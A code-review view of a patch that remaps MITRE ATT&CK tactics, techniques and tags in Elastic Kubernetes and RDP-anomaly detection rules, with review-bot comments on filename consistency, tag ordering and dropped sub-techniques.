@@ -57,13 +57,7 @@ Kubernetes, a container orchestration platform, manages applications across clus risk_score = 47 rule_id = "ec81962e-4bc8-48e6-bfb0-545fc97d8f6a" severity = "medium" -tags = [ - "Data Source: Kubernetes", - "Domain: Kubernetes", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide" - ] +tags = ["Tactic: Privilege Escalation", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -74,7 +68,12 @@ kubernetes.audit.stage == "ResponseComplete" and `kubernetes.audit.annotations.a [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml b/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml index b6fa7170cb4..b99c04c5b26 100644 --- a/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml +++ b/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/17" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
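Review bot: The rule's single tactic becomes Privilege Escalation while the file stays `execution_forbidden_creation_request.toml` and its description and guide (outside this hunk) presumably still talk about execution, so the name and narrative now disagree with the tag and threat mapping; rename the file to a `privilege_escalation_` prefix or keep an Execution entry. T1078 Valid Accounts under TA0004 is also a stretch for a *forbidden* create: the principal authenticated but was denied, which is an attempted rather than achieved escalation, so I'd add a short `note` to the rule explaining that the intent is an authenticated principal probing for rights it lacks, or choose a technique that describes the attempt itself.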
@@ -55,13 +55,7 @@ Kubernetes, a container orchestration platform, manages applications across clus risk_score = 47 rule_id = "4b77d382-b78e-4aae-85a0-8841b80e4fc4" severity = "medium" -tags = [ - "Data Source: Kubernetes", - "Domain: Kubernetes", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", -] +tags = ["Tactic: Discovery", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -74,11 +68,15 @@ user_agent.original:(* and not (*kubernetes/$Format)) [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml b/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml index 1dcd69850d3..9c6166c4479 100644 --- a/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml +++ b/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/18" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
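Review bot: Moving this rule from Execution to Discovery (T1613 / TA0007) leaves the file named `execution_forbidden_request_from_unsual_user_agent.toml`, so the on-disk prefix no longer matches the tag or threat mapping; the same applies to `execution_unusual_request_response_by_user_agent.toml` in the hunks that follow. Renaming both to a `discovery_` prefix (and fixing the `unsual` typo while at it) keeps the rule tree consistent with the mapping. The description and investigation guide outside this hunk should be re-read for "execution" wording as well.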
@@ -56,14 +56,7 @@ Kubernetes orchestrates containerized applications, relying on API requests for risk_score = 21 rule_id = "8a1db198-da6f-4500-b985-7fe2457300af" severity = "low" -tags = [ - "Data Source: Kubernetes", - "Domain: Kubernetes", - "Domain: Container", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", -] +tags = ["Tactic: Discovery", "Data Source: Kubernetes", "Domain: Kubernetes", "Domain: Container", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -79,11 +72,15 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [rule.new_terms] field = "new_terms_fields" value = ["kubernetes.audit.annotations.authorization_k8s_io/decision", "kubernetes.audit.user.username", "user_agent.original"] diff --git a/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml b/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml index a850dfd2023..c7d081ec603 100644 --- a/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml +++ b/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/13" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -67,14 +67,7 @@ references = [ risk_score = 47 rule_id = "63c057cc-339a-11ed-a261-0242ac120002" severity = "medium" -tags = [ - "Data Source: Kubernetes", - "Domain: Kubernetes", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Tactic: Initial Access", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -102,7 +95,6 @@ reference = "https://attack.mitre.org/techniques/T1078/001/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml b/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml index 229f671329b..803bf630a6a 100644 --- a/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml +++ b/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2025/06/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,7 +76,7 @@ references = [ risk_score = 47 rule_id = "65f9bccd-510b-40df-8263-334f03174fed" severity = "medium" -tags = ["Data Source: Kubernetes", "Tactic: Execution", "Tactic: Persistence", "Resources: Investigation Guide"] +tags = ["Tactic: Initial Access", "Tactic: Persistence", "Data Source: Kubernetes", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -91,14 +91,26 @@ event.dataset : "kubernetes.audit_logs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1133" name = "External Remote Services" reference = "https://attack.mitre.org/techniques/T1133/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml b/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml index ec7881b3507..83338845d36 100644 --- a/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml +++ b/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/20" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -85,24 +85,24 @@ not (
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1611"
-name = "Escape to Host"
-reference = "https://attack.mitre.org/techniques/T1611/"
+id = "T1610"
+name = "Deploy Container"
+reference = "https://attack.mitre.org/techniques/T1610/"
 
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1610"
-name = "Deploy Container"
-reference = "https://attack.mitre.org/techniques/T1610/"
+id = "T1611"
+name = "Escape to Host"
+reference = "https://attack.mitre.org/techniques/T1611/"
 
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml
index de40e62409d..b64d6a1d21f 100644
--- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml
+++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/07/05"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2026/02/02"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -96,24 +96,24 @@ not kubernetes.audit.requestObject.spec.containers.image: (
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1611"
-name = "Escape to Host"
-reference = "https://attack.mitre.org/techniques/T1611/"
+id = "T1610"
+name = "Deploy Container"
+reference = "https://attack.mitre.org/techniques/T1610/"
 
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1610"
-name = "Deploy Container"
-reference = "https://attack.mitre.org/techniques/T1610/"
+id = "T1611"
+name = "Escape to Host"
+reference = "https://attack.mitre.org/techniques/T1611/"
 
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml
index 15f42caaf18..0161fff49b9 100644
--- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml
+++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/07/05"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2026/02/02"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -101,24 +101,24 @@ not (
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1611"
-name = "Escape to Host"
-reference = "https://attack.mitre.org/techniques/T1611/"
+id = "T1610"
+name = "Deploy Container"
+reference = "https://attack.mitre.org/techniques/T1610/"
 
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1610"
-name = "Deploy Container"
-reference = "https://attack.mitre.org/techniques/T1610/"
+id = "T1611"
+name = "Escape to Host"
+reference = "https://attack.mitre.org/techniques/T1611/"
 
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml
index eebe0cdc29e..96772301c11 100644
--- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml
+++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/07/05"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2026/02/02"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -99,24 +99,24 @@ not kubernetes.audit.requestObject.spec.containers.image: (
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1611"
-name = "Escape to Host"
-reference = "https://attack.mitre.org/techniques/T1611/"
+id = "T1610"
+name = "Deploy Container"
+reference = "https://attack.mitre.org/techniques/T1610/"
 
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1610"
-name = "Deploy Container"
-reference = "https://attack.mitre.org/techniques/T1610/"
+id = "T1611"
+name = "Escape to Host"
+reference = "https://attack.mitre.org/techniques/T1611/"
 
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml
index ec7c7a3285f..253479e9a3c 100644
--- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml
+++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/07/11"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2026/02/02"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -107,24 +107,24 @@ not kubernetes.audit.requestObject.spec.containers.image: (
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1611"
-name = "Escape to Host"
-reference = "https://attack.mitre.org/techniques/T1611/"
+id = "T1610"
+name = "Deploy Container"
+reference = "https://attack.mitre.org/techniques/T1610/"
 
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1610"
-name = "Deploy Container"
-reference = "https://attack.mitre.org/techniques/T1610/"
+id = "T1611"
+name = "Escape to Host"
+reference = "https://attack.mitre.org/techniques/T1611/"
 
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml
index f68d1d287ff..0ad2e174afe 100644
--- a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml
+++ b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/07/05"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2026/02/02"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -99,24 +99,24 @@ not kubernetes.audit.requestObject.spec.containers.image: (
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1611"
-name = "Escape to Host"
-reference = "https://attack.mitre.org/techniques/T1611/"
+id = "T1610"
+name = "Deploy Container"
+reference = "https://attack.mitre.org/techniques/T1610/"
 
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1610"
-name = "Deploy Container"
-reference = "https://attack.mitre.org/techniques/T1610/"
+id = "T1611"
+name = "Escape to Host"
+reference = "https://attack.mitre.org/techniques/T1611/"
 
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml
index 550d4cdd47e..157115d18dd 100644
--- a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml
+++ b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/04"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -54,14 +54,7 @@ references = [ risk_score = 47 rule_id = "3c82bf84-5941-495b-ac41-0302f28e1a90" severity = "medium" -tags = [ - "Data Source: Kubernetes", - "Domain: Kubernetes", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Tactic: Execution", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -82,6 +75,19 @@ sequence by user.name with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" @@ -93,9 +99,9 @@ name = "Additional Container Cluster Roles" reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -111,6 +117,6 @@ name = "Additional Container Cluster Roles" reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
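Review bot: The `tags` array in the first hunk is collapsed from one entry per line into a single line of roughly 190 characters, with the three `Tactic:` entries placed ahead of the `Domain:`/`Data Source:` entries, whereas the o365 rules touched later in this same patch put `Tactic:` entries after the `Domain:` entries. If this is exactly what the rule formatter emits, fine; otherwise keep the one-entry-per-line layout and pick a single ordering convention (for example grouped by prefix) so that later tag changes show up as single-line diffs. The added `[[rule.threat]]` block for T1610 under Execution does line up with the new `"Tactic: Execution"` tag, so no consistency problem there.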
diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml index cd55cbf8734..c4900f37adf 100644 --- a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml +++ b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -53,14 +53,7 @@ references = [ risk_score = 21 rule_id = "78c6559d-47a7-4f30-91fe-7e2e983206c2" severity = "low" -tags = [ - "Data Source: Kubernetes", - "Domain: Kubernetes", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Tactic: Execution", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -75,38 +68,24 @@ not kubernetes.audit.user.groups:"system:masters" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" [[rule.threat.technique.subtechnique]] -id = "T1098.006" -name = "Additional Container Cluster Roles" -reference = "https://attack.mitre.org/techniques/T1098/006/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1053.007" +name = "Container Orchestration Job" +reference = "https://attack.mitre.org/techniques/T1053/007/" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.006" -name = "Additional Container Cluster Roles" -reference = "https://attack.mitre.org/techniques/T1098/006/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original", "source.ip", "kubernetes.audit.user.username"] diff --git a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml index 0314f867e2f..747bfb801fd 100644 --- a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml +++ b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml 
@@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,9 +89,9 @@ name = "Additional Container Cluster Roles" reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -107,6 +107,6 @@ name = "Additional Container Cluster Roles" reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml index 6c59087b0b3..c482f279901 100644 --- a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml +++ b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/13" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -93,16 +93,24 @@ not kubernetes.audit.requestObject.spec.containers.image:( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.001" -name = "Default Accounts" -reference = "https://attack.mitre.org/techniques/T1078/001/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml index a2e6b2e13ee..8993db07aa2 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 @@ -51,13 +51,7 @@ The Lateral Movement Detection integration detects lateral movement activity by - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Lateral Movement Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", -] +tags = ["Use Case: Lateral Movement Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Execution", "Tactic: Lateral Movement", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis 
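Review bot: This file gains an Execution tactic entry (T1610) but no `tags` hunk appears between its date bump and this hunk, so unless the existing tags already contain `"Tactic: Execution"` the rule's tags and its threat tactics now disagree; add the tag or confirm it is present. The hunk also drops the T1078.001 Default Accounts sub-technique with no rationale in the commit message, which narrows ATT&CK coverage for a rule that is specifically about a built-in controller service account being assigned to a workload. If that is deliberate, a sentence in the commit (or in the rule's `note`) explaining why would save the next reviewer of coverage reports from re-adding it.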
@@ -95,14 +89,31 @@ Remote Desktop Protocol (RDP) facilitates remote access to systems, often target - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems have been compromised.""" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml index db8f0b280e8..9b7810b788f 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 
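Review bot: The new first `[[rule.threat]]` entry maps this job to T1059 Command and Scripting Interpreter under Execution, which asserts that the anomalous argument counts come from a shell or interpreter; from what is visible here (an anomaly job on the mean number of RDP process arguments) that is an inference rather than something the job checks, so either state in the rule `description`/`note` which processes feed the job or keep the rule at T1021.001 only. Also, the added `[[rule.threat.technique.subtechnique]]` table is glued to the parent's `reference = "https://attack.mitre.org/techniques/T1021/"` line while a blank line was added after `framework`; insert a blank line before the sub-technique table so the layout matches the other blocks in this hunk.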
